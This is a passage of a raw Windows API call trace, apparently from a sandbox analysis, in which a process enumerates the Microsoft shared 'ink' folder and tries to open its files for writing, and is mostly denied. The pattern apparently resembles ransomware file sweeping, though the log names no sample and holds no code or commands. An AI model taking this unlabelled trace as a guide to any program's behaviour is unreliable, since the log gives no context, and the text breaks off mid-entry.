[0100.696] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x853a0 | out: hHeap=0x20000) returned 1 [0100.696] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0100.696] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0100.696] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0100.696] CloseHandle (hObject=0x27c) returned 1 [0100.696] AreFileApisANSI () returned 1 [0100.696] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d528, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0100.696] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x85c60 [0100.696] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d528, cbMultiByte=-1, lpWideCharStr=0x85c60, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ro-RO\\tipresx.dll.mui") returned 73 [0100.696] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ro-RO\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ro-ro\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0100.697] GetLastError () returned 0x5 [0100.697] GetLastError () returned 0x5 [0100.697] SetLastError (dwErrCode=0x5) [0100.697] GetLastError () returned 0x5 [0100.697] SetLastError (dwErrCode=0x5) [0100.697] GetLastError () returned 0x5 [0100.697] SetLastError (dwErrCode=0x5) [0100.697] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85c60 | out: hHeap=0x20000) returned 1 [0100.697] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0100.697] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0100.697] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d528 | out: hHeap=0x20000) returned 1 [0100.697] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.697] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.697] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x327f510, ftCreationTime.dwHighDateTime=0x90, ftLastAccessTime.dwLowDateTime=0x327f498, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x8c850, ftLastWriteTime.dwHighDateTime=0x327f288, nFileSizeHigh=0x90, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="t ", cAlternateFileName="渘Ĉ㪀ā湈Ĉ蘿̧⨀")) returned 0 [0100.697] FindClose (in: hFindFile=0x78150 | out: hFindFile=0x78150) returned 1 [0100.697] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0100.697] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fb0 [0100.697] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0100.697] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fb0 | out: hHeap=0x20000) returned 1 [0100.697] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e580 | out: hHeap=0x20000) returned 1 [0100.697] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.697] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e030 | out: hHeap=0x20000) returned 1 [0100.697] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0100.697] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35270 | out: hHeap=0x20000) returned 1 [0100.697] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x467b8 | out: hHeap=0x20000) returned 1 [0100.697] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0100.697] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ed0 [0100.698] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0100.698] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ed0 | out: hHeap=0x20000) returned 1 [0100.698] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0100.698] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f30 [0100.698] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0100.698] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f30 | out: hHeap=0x20000) returned 1 [0100.698] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0100.698] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75f30 [0100.698] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.698] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f2c8 [0100.698] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0100.698] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.698] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6de98 [0100.698] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f2c8 | out: hHeap=0x20000) returned 1 [0100.698] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.698] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.698] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.698] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.698] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6de98 | out: hHeap=0x20000) returned 1 [0100.698] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0100.698] AreFileApisANSI () returned 1 [0100.698] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\rtscom.dll", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\rtscom.dll", lpUsedDefaultChar=0x0) returned 62 [0100.698] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0100.698] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.698] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.698] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0100.698] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0100.698] AreFileApisANSI () returned 1 [0100.698] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 62 [0100.698] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7c) returned 0x6dfa8 [0100.698] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x6dfa8, cchWideChar=62 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\rtscom.dll") returned 62 [0100.699] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\rtscom.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\rtscom.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0100.702] GetFileType (hFile=0x368) returned 0x1 [0100.702] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6dfa8 | out: hHeap=0x20000) returned 1 [0100.702] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0100.702] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0100.702] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0100.703] CloseHandle (hObject=0x368) returned 1 [0100.703] AreFileApisANSI () returned 1 [0100.703] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 62 [0100.703] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7c) returned 0x6e140 [0100.703] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x6e140, cchWideChar=62 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\rtscom.dll") returned 62 [0100.703] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\rtscom.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\rtscom.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0100.703] GetLastError () returned 0x5 [0100.703] GetLastError () returned 0x5 [0100.703] SetLastError (dwErrCode=0x5) [0100.703] GetLastError () returned 0x5 [0100.703] SetLastError (dwErrCode=0x5) [0100.703] GetLastError () returned 0x5 [0100.703] SetLastError (dwErrCode=0x5) [0100.703] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e140 | out: hHeap=0x20000) returned 1 [0100.703] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0100.703] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0100.703] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0100.704] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.704] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.704] FindNextFileW (in: hFindFile=0x780d0, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa080e4d1, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3c699c, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="ru-RU", cAlternateFileName="")) returned 1 [0100.704] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0100.704] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35050 [0100.704] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0100.704] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35050 | out: hHeap=0x20000) returned 1 [0100.704] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0100.704] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35210 [0100.704] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0100.704] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35210 | out: hHeap=0x20000) returned 1 [0100.704] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75fa8 [0100.704] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f2c8 [0100.704] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0100.704] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e828 [0100.704] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f2c8 | out: hHeap=0x20000) returned 1 [0100.704] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.704] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.704] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.704] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.704] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e828 | out: hHeap=0x20000) returned 1 [0100.704] AreFileApisANSI () returned 1 [0100.704] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ru-RU", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ru-RU", lpUsedDefaultChar=0x0) returned 57 [0100.704] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0100.704] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.704] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.704] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0100.704] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfd0 [0100.704] AreFileApisANSI () returned 1 [0100.704] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0100.704] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x6a3b0 [0100.704] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x6a3b0, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ru-RU") returned 57 [0100.705] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ru-RU" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ru-ru"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0100.705] GetLastError () returned 0x5 [0100.705] GetLastError () returned 0x5 [0100.705] SetLastError (dwErrCode=0x5) [0100.705] GetLastError () returned 0x5 [0100.705] SetLastError (dwErrCode=0x5) [0100.705] GetLastError () returned 0x5 [0100.705] SetLastError (dwErrCode=0x5) [0100.705] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0100.705] AreFileApisANSI () returned 1 [0100.705] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0100.705] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x6a5b0 [0100.705] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x6a5b0, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ru-RU") returned 57 [0100.705] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ru-RU" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ru-ru"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0100.705] GetLastError () returned 0x5 [0100.705] GetLastError () returned 0x5 [0100.705] SetLastError (dwErrCode=0x5) [0100.705] GetLastError () returned 0x5 [0100.705] SetLastError (dwErrCode=0x5) [0100.705] GetLastError () returned 0x5 [0100.705] SetLastError (dwErrCode=0x5) [0100.705] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a5b0 | out: hHeap=0x20000) returned 1 [0100.705] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0100.706] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0100.706] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0100.706] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.706] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.706] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.706] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.706] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0100.706] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5fe78 [0100.706] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0100.706] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e2d8 [0100.706] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5fe78 | out: hHeap=0x20000) returned 1 [0100.706] FindNextFileW (in: hFindFile=0x780d0, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d126e12, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0xe46546cb, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0xe46546cb, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0xb3200, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="ShapeCollector.exe", cAlternateFileName="")) returned 1 [0100.706] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0100.706] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0100.706] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0100.706] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0100.706] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0100.706] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0100.706] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0100.706] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0100.706] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0100.706] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0100.706] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0100.706] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fb0 [0100.706] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6de98 [0100.706] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6df20 [0100.706] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ru-RU\\*", fInfoLevelId=0x0, lpFindFileData=0x327efb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x327efb8) returned 0x77fd0 [0100.706] FindNextFileW (in: hFindFile=0x77fd0, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa080e4d1, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3c699c, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0100.706] FindNextFileW (in: hFindFile=0x77fd0, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e3af7a2, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e3af7a2, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e3af7a2, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2800, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0100.706] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6df20 | out: hHeap=0x20000) returned 1 [0100.706] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.707] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.707] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.707] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0100.707] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.707] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.707] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.707] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.707] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0100.707] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ea48 [0100.707] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x464a8 [0100.707] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e2d8 | out: hHeap=0x20000) returned 1 [0100.707] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0100.707] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35170 [0100.707] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0100.707] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35170 | out: hHeap=0x20000) returned 1 [0100.707] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0100.707] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350f0 [0100.707] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0100.707] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x350f0 | out: hHeap=0x20000) returned 1 [0100.707] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.707] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6dfa8 [0100.707] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.707] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x4ebc8 [0100.707] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6dfa8 | out: hHeap=0x20000) returned 1 [0100.707] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.707] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8d220 [0100.707] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0100.707] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.707] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.707] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: 